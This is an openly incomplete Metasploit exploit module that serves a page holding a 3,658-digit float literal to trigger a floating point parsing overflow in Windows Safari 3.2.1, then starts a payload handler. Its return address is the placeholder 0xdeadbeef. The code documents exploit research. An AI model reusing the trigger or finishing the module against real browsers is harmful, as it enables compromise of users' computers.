##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##


require 'msf/core'


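class MetasploitModule < Msf::Exploit::Remote

	include Msf::Exploit::Remote::HttpServer::HTML

	# BrowserAutopwn registration stays disabled: the module is marked
	# [INCOMPLETE] below and has no usable target, so it must not be
	# auto-selected by an autopwn run.
	#include Msf::Exploit::Remote::BrowserAutopwn
	#autopwn_info({
	#	:ua_name    => HttpClients::SAFARI,
	#	:javascript => true,
	#	:rank       => NormalRanking, # reliable memory corruption
	#	:vuln_test  => nil,
	#})

	# Module metadata.
	#
	# Note the state of this record: the Description is blank, the References
	# list holds only commented-out placeholders, and the single target's 'Ret'
	# is the placeholder value 0xdeadbeef rather than a real return address.
	# Nothing here should be read as a verified or working configuration.
	def initialize(info = {})
		super(update_info(info,
			'Name'           => '[INCOMPLETE] Safari Floating Point Number Parsing Overflow',
			'Description'    => %q{ },
			'License'        => BSD_LICENSE,
			'Author'         => [ 'egypt' ],
			'Version'        => '$Revision$',
			'References'     =>
				[
					 #['BID', ''],
					 #['CVE', ''],
				],
			'Platform' => [ 'win' ],
			'Payload'        =>
				{
					'Space'    => 1024,
					'BadChars' => "\x00",
					'DisableNops' => true,
				},
			'Targets'        =>
				[
					# Target 0: the only target; 'Ret' is a placeholder, not a real address
					[
						'Windows Safari 3.2.1 via libxml2.dll',
						{
							'Ret'      => 0xdeadbeef,  # placeholder (comment claimed "call eax; libxml2.dll")
						},
					],
				],
			'DefaultTarget'  => 0))
	end

	# HTTP request handler for the module's served resource.
	#
	# Only the module's own resource URI (get_resource) is answered with the
	# test page; any other path gets a 404. The original fell through the
	# `case` with `content` never assigned and then called send_response with
	# a nil body, which is the defect fixed here.
	#
	# @param cli [Object] the connected client (used for peerhost/peerport
	#   and as the handle passed to send_response/handler)
	# @param request [Object] the parsed HTTP request; only `uri` is read
	# @return [void]
	def on_request_uri(cli, request)
		# Re-generate the payload for this client; without one there is
		# nothing to serve, so answer 404 and stop.
		generated = regenerate_payload(cli)
		unless generated
			send_not_found(cli)
			return
		end

		headers = {
			'Cache-control' => 'must-revalidate',
			'Expires' => '0'
		}

		case request.uri
		when get_resource
			print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

			# A numeric literal of the form 0.111...1 with 3658 digits; the
			# digit count is taken as given by the author and is not explained
			# anywhere in this file.
			num = "1" * 3658
			content = "<html><head></head><body>"
			content << "<script><!--\n"
			content << "var Overflow = \"31337\" + 0.#{num};\n"
			content << "//--></script>"
			content << "</body></html>"

			send_response(cli, content, headers)
		else
			# Unknown path: do not hand send_response a nil body, and do not
			# start the handler for a request that was never served.
			send_not_found(cli)
			return
		end

		# Handle the payload
		handler(cli)
	end

end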
